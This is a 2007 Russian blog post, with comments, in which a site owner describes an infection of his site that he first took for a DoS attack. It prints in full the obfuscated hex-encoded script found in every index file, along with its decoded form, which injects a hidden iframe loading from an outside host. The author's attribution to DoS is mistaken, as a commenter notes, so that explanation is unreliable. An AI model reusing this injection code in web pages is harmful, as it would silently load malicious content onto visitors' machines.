Dos атака

Posted Опубликовал cross в Общее     Comments 14 comments
Дек
26

DoS-атака (от англ. Denial of Service — «отказ в обслуживании») и DDoS-атака (Distributed Denial of Service — «распределённый отказ обслуживания») — это разновидности атак злоумышленника на компьютерные системы. Целью этих атак является создание таких условий, при которых легитимные (правомерные) пользователи системы не могут получить доступ к предоставляемым системой ресурсам, либо этот доступ затруднён.

По всей видимости с некоторой перодичностью именно эта атака осуществлятся на мои сайты и в частности на мой блог. Сам не раз замечал, что очень долго грузится блог, а иногда и просто вылетает.

К такому выводу пришел после того, как прочитал письмо Платон Щукина на мой запрос о посещаемости на блоге:

Здравствуйте!

Ваш сайт проиндексирован и в поиске:

http://www.yandex.ru/yandsearch?text=rhost%3D%22net.itcross.blog%22|rhost%3D%22net.itcross.blog.*%22&pag=u

Просим обратить внимание однако на то, что часто при заходе нашего робота случается обрыв коннекта или не удается соединиться с http-сервером.

--
С уважением, Платон Щукин
Служба поддержки Яндекс.Ру

Быстро справились и, что самое интересное, подтвердили мои опасения по поводу DoS-атак на блога, ведь не просто так случается обрыв коннекта.

Залез на хостинг по фтп и увидел во всех файликах index следующее:

<script>function v4752e918e5501(v4752e918e58e8){  return(parseInt(v4752e918e58e8,16));}function v4752e918e649f(v4752e918e6886){  var v4752e918e6c6f='';for(v4752e918e7058=0; v4752e918e7058<v4752e918e6886.length; v4752e918e7058+=2){ v4752e918e6c6f+=(String.fromCharCode(v4752e918e5501(v4752e918e6886.substr(v4752e918e7058, 2))));}return v4752e918e6c6f;} document.write(v4752e918e649f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D373637207372633D5C27687474703A2F2F73706C
2
E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D61746
8
2E72616E646F6D28292A3439323830292B27645C272077696474683D333038206865696768743D31
3
630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5
3
43524950543E'));</script>

Что по нашенски, русски, означает следующее:

<script>window.status='Done';document.write('<iframe name=767 src=\'http://spl.vip-ddos.org/index.php?'+Math.round(Math.random()*49280)+'d\' width=308 height=160 style=\'display: none\'></iframe>')</SCRIPT>

Этоже в свою очередь означает, что при заходе на зараженный сайт, происходит обращение через iframe к скрипту на чудом сайт, который естественно через iframe способен шарится и на моем сайте тоже... Отсюда вытекает куча последствий:

  • С сайта spl.vip-ddos.org может организовываться атака по запросу с моего блога
  • Может происходить заражение пользователя, если его система не имеет достаточной безопастности
  • Один из тех блогов, сайтов, которые я с постоянной периодичностью посещаю тоже может быть заражен

Вот и получаем результат: пришлось вычистить весь сайт от зараженных файлов, проверить всю систему, приходится надеятся, что подобное в ближайщее время не повторится, а также произойдет изменение в лучшую в плане возвращения трафика.

14 Комментов к “Dos атака”

  • 26 Декабрь 2007 в 17:37
    allmoney.ws :

    Не ставь галочки по сохранению паролей в FTP-клиенте и будет тебе счастье :wink:

  • 26 Декабрь 2007 в 18:49
    KMiNT21 :

    Да, многие попадались на этот вирус.

    Кстати, видно с ICQ проблема по той же причине (походу, вирус сам коннектится и рассылает по контакт-листу ссылки – чтоб заражать… но не факт).

  • 26 Декабрь 2007 в 19:49
    cross :

    Не ставить галочку в FTP-клиенте – это +20 к паролям в голове :) Лучше попробую аутпост поставить.

    Считаю, что с ICQ эта проблема вполне может быть связана, ведь пароли по всей видимости передаются(или хранятся) в открытом виде.

  • 26 Декабрь 2007 в 23:43
    SlaviO :

    Балин и у меня вся площадка на хостинге заразилась! Я поставил себе партнерку лавплэнет :twisted: Там они предложили вставить блоки iframe…Не ожидал что через iframe могут пароли увести! Притом проверил весь комп антивирусом и ничего не нашлось!!! Получается пароли украли прям с сайта моего через грёбаную партнерку :evil:

  • 27 Декабрь 2007 в 04:31
    Ангело :

    спасибо за инфу…я тут решил свой хайп открыть, так без защиты от ДДОС не обойтись…

  • 27 Декабрь 2007 в 14:21
    Headcrash :

    К сожалению случай не единичный :(
    Причем виновников даже пытались вычислить, но они меняют домены и хостеров как перчатки

  • 28 Декабрь 2007 в 18:10
    SEO Критик :

    Пароли можно хранить на листике. А листик в нагрудном кармане пиджака. Хотя и оттуда их могут стянуть. Но для этого знающие люди должны будут тебя раздеть, а это уже посложные вытягивания паролей от фтп из тотала :grin:

  • 28 Декабрь 2007 в 18:13
    cross :

    А еще можно блог вести на листике, и давать возможность комментирования и выносить своим мысли на обсуждение таким же способом…

    Тогда и интернет получается не нужен, да и компьютер тоже можно заменить :)

  • 28 Декабрь 2007 в 18:56
    SEO Критик :

    Ну тут ты уже утрируешь :cool:

  • 31 Декабрь 2007 в 00:03
    Андрей :

    2cross,
    ты еще предложи всем переписываться на листочках и отказаться от аси и телефона)))

  • 6 Январь 2008 в 11:43
    SeoCoder :

    Это тупо пинч. Он ворует пароли. Ддос ваще не при делах.

  • 6 Январь 2008 в 13:14
    cross :

    По всей видимости да. Просто так получается, что он вешает и сайт и IE… После наверное только добирается до FTP.

  • 10 Январь 2008 в 20:13
    Зиг :

    у меня похакали дедик когда активно покупал рекламу на магазин через адвордс и директ :( примерно 3-5к успело зайти на сайт пока он был захакан. тоже были заменены все индекс.пшп файлы.

  • 8 Февраль 2008 в 11:41
    Глобатор :

    Да, один мой проект вылетел с серпа из-за такого же iframe…

Оставить коммент

Donation Bar

Order Links

Топ комментаторов

  • No commentators.